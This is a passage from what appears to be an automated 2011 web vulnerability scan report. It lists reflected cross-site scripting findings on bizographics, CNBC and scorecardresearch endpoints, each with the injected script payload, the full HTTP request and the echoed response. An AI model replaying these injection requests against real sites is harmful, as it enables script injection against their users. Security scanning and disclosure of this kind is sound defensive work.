xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Thu, 16 Jun 2011 11:22:48 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe0TdSL9EBisPCVExkNK7HUtFp4B4dlWpgdiiHeTJtHBm2Jz8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 552
Connection: keep-alive

dj.module.ad.bio.loadBizoData8e311<script>alert(1)</script>7fac11f4bf5({"bizographics":{"location":{"code":"texas","name":"USA - Texas"},"industry":[{"code":"business_services","name":"Business Services"}],"functional_area":[{"code":"it_systems_analysts","name":"IT Syste
...[SNIP]...

3.30. http://api.bizographics.com/v1/profile.json [api_key parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 417f7<script>alert(1)</script>fa18692aa93 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?&callback=dj.module.ad.bio.loadBizoData&api_key=r9t72482usanbp6sphprhvun417f7<script>alert(1)</script>fa18692aa93 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe08y7VMjWLN6FExkNK7HUtFp4B4dlWpgdgD0CnxkWGt3T8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Thu, 16 Jun 2011 11:23:06 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 84
Connection: keep-alive

Unknown API key: (r9t72482usanbp6sphprhvun417f7<script>alert(1)</script>fa18692aa93)

3.31. http://api.bizographics.com/v1/profile.redirect [api_key parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.redirect

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 45f20<script>alert(1)</script>66a401f8b4 was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?callback_url=http%3A%2F%2Fpix04.revsci.net%2FD10889%2Fa1%2F0%2F3%2F0.gif%3FD%3DDM_LOC%3Dhttp%3A%2F%2Fbizo.com%3F&api_key=bbe168f7d7bf46369bbe29684c749a2745f20<script>alert(1)</script>66a401f8b4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe08y7VMjWLN6FExkNK7HUtFp4B4dlWpgdgD0CnxkWGt3T8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Thu, 16 Jun 2011 11:22:52 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 91
Connection: keep-alive

Unknown API key: (bbe168f7d7bf46369bbe29684c749a2745f20<script>alert(1)</script>66a401f8b4)

3.32. http://api.bizographics.com/v1/profile.redirect [callback_url parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.bizographics.com
Path:	/v1/profile.redirect

Issue detail

The value of the callback_url request parameter is copied into the HTML document as plain text between tags. The payload 2597e<script>alert(1)</script>0d77d675f14 was submitted in the callback_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.redirect?callback_url=2597e<script>alert(1)</script>0d77d675f14&api_key=bbe168f7d7bf46369bbe29684c749a27 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/home-page
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe08y7VMjWLN6FExkNK7HUtFp4B4dlWpgdgD0CnxkWGt3T8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Thu, 16 Jun 2011 11:22:46 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 58
Connection: keep-alive

Unknown Referer: 2597e<script>alert(1)</script>0d77d675f14

3.33. http://api.cnbc.com/api/movers/movers.asp [chartType parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.cnbc.com
Path:	/api/movers/movers.asp

Issue detail

The value of the chartType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6e87"><script>alert(1)</script>a810848f9e3 was submitted in the chartType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/movers/movers.asp?chartType=gainersb6e87"><script>alert(1)</script>a810848f9e3&rowCount=5&link=quote HTTP/1.1
Host: api.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 16 Jun 2011 11:26:08 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: private
Content-Length: 2518
Expires: Thu, 16 Jun 2011 10:46:08 GMT
X-Powered-By: ASP.NET
IISExport: This web site was exported using IIS Export v4.2
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Market Movers</title>
<link rel="stylesheet" href
...[SNIP]...
<div id="module" rowCount="5" chartType="gainersb6e87"><script>alert(1)</script>a810848f9e3">
...[SNIP]...

3.34. http://api.cnbc.com/api/movers/movers.asp [rowCount parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://api.cnbc.com
Path:	/api/movers/movers.asp

Issue detail

The value of the rowCount request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef9b0"><script>alert(1)</script>fa4cca80932 was submitted in the rowCount parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/movers/movers.asp?chartType=gainers&rowCount=5ef9b0"><script>alert(1)</script>fa4cca80932&link=quote HTTP/1.1
Host: api.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 16 Jun 2011 11:26:11 GMT
Content-Type: text/html
Connection: keep-alive
Cache-Control: private
Content-Length: 2518
Expires: Thu, 16 Jun 2011 10:46:11 GMT
X-Powered-By: ASP.NET
IISExport: This web site was exported using IIS Export v4.2
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<title>Market Movers</title>
<link rel="stylesheet" href
...[SNIP]...
<div id="module" rowCount="5ef9b0"><script>alert(1)</script>fa4cca80932" chartType="gainers">
...[SNIP]...

3.35. http://b.scorecardresearch.com/beacon.js [c1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 1ee1b<script>alert(1)</script>95003c59d34 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=21ee1b<script>alert(1)</script>95003c59d34&c2=1000004&c3=&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 23 Jun 2011 11:26:38 GMT
Date: Thu, 16 Jun 2011 11:26:38 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"21ee1b<script>alert(1)</script>95003c59d34", c2:"1000004", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

3.36. http://b.scorecardresearch.com/beacon.js [c10 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 77372<script>alert(1)</script>ed4290ff22e was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=2&c4=12268&c5=38114&c6=&c10=21548077372<script>alert(1)</script>ed4290ff22e&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1308225213393&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fburp%2Fshow%2F4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 23 Jun 2011 12:08:07 GMT
Date: Thu, 16 Jun 2011 12:08:07 GMT
Content-Length: 1248
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
th-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"8", c2:"2113", c3:"2", c4:"12268", c5:"38114", c6:"", c10:"21548077372<script>alert(1)</script>ed4290ff22e", c15:"", c16:"", r:""});

3.37. http://b.scorecardresearch.com/beacon.js [c15 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload db889<script>alert(1)</script>e41ff1f8c71 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=1000004&c3=&c4=&c5=&c6=&c15=db889<script>alert(1)</script>e41ff1f8c71 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 23 Jun 2011 11:26:45 GMT
Date: Thu, 16 Jun 2011 11:26:45 GMT
Content-Length: 3588
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"2", c2:"1000004", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"db889<script>alert(1)</script>e41ff1f8c71", c16:"", r:""});

3.38. http://b.scorecardresearch.com/beacon.js [c2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 30733<script>alert(1)</script>d3318b38e6c was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=100000430733<script>alert(1)</script>d3318b38e6c&c3=&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 23 Jun 2011 11:26:38 GMT
Date: Thu, 16 Jun 2011 11:26:38 GMT
Content-Length: 3588
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
on(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"2", c2:"100000430733<script>alert(1)</script>d3318b38e6c", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

3.39. http://b.scorecardresearch.com/beacon.js [c3 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 6b3d6<script>alert(1)</script>4917317ac4 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=1000004&c3=6b3d6<script>alert(1)</script>4917317ac4&c4=&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 23 Jun 2011 11:26:39 GMT
Date: Thu, 16 Jun 2011 11:26:39 GMT
Content-Length: 3587
Connection: close

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
ry{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();

COMSCORE.beacon({c1:"2", c2:"1000004", c3:"6b3d6<script>alert(1)</script>4917317ac4", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

3.40. http://b.scorecardresearch.com/beacon.js [c4 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload ae68d<script>alert(1)</script>c0ba3c3354f was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=2&c2=1000004&c3=&c4=ae68d<script>alert(1)</script>c0ba3c3354f&c5=&c6=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43418837
